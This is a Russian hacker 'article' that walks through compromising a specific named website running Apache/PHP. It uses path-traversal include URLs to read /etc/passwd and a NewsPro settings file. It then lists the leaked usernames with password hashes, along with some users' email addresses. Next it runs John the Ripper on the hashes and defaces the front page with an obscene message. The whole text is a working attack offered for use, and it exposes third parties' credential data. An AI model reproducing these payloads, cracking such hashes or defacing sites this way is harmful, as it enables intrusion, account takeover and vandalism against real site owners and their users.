Пишу статью как трахнуть машину под Apache/PHP. Казалось бы неприступная крепость, однако это не так. Рассмотрим сие действо на примере
http://www.dirgotronix.net/. Ошибка обратного пути в скрипте дает нам права на чтение любого файла с правами nobody.

http://www.dirgotronix.net/index1.php?p=0|1|&inc=../../../../../../etc/passwd

Но это для примера, на самом деле получить пароли оттуда невозможно, так как все пассы в shadow. Что же делать и как нам быть? На сем серваке стоит система новостей NEWSPRO - ей то и нагадим. Попостим на парадной странице?

http://www.dirgotronix.net/NewsPro/newspro.cgi

Спрашивает логин и пассу:)) Фигня, лезем - http://www.dirgotronix.net/index1.php?p=0|1|&inc=NewsPro/nsettings.cgi. Смотрим фрагмент:

userdata``xJason~eEVRZUXE83LV2~jason@dirgo.com~3|
Adam~jcQuuR5qQTMIY~darklord420@hotmail.com~1...   ~1|Ian~3dqS3BOppYJ12~ceol.mhor@scotland.com~1

приводим сию строку к виду:
---------------------------
Adam:jcQuuR5qQTMIY
xJason:eEVRZUXE83LV2
Libby:q9ns.RuPxitpo
Tom:jJB7ZysImv19U
Donald:BcaF5eZqNrklU
Casey:qP93wjt.N.vIw
Ian:3dqS3BOppYJ12
---------------------------

Сохраняем на своей никсовой машине aka pass.txt. И даем это файло на растерзание доброму Джону:
./john pass.txt

Курим пару сигарет и пьем бутылку ПеННОГО пива. Все. Лезем на:
http://www.dirgotronix.net/NewsPro/newspro.cgi

ПОСТИМ ПОД НИКАМИ РАСШИФРОВАННЫХ ЮЗВЕРЕЙ ЛЮБУЮ МУТЬ НА ПАРАДНОЙ СТРАНИЦЕ aka :

I`m crazY , I`m FOOL, BUT my penis WONDERFUL!!! HA-HA- HA !! LOVE ME SUCKZZZZ!!! WE ARE THE GREATEST! RUSSIA - BEST! FUCKZ TO FBI & US HACKERS!

Автор: -=Sky12DooR=-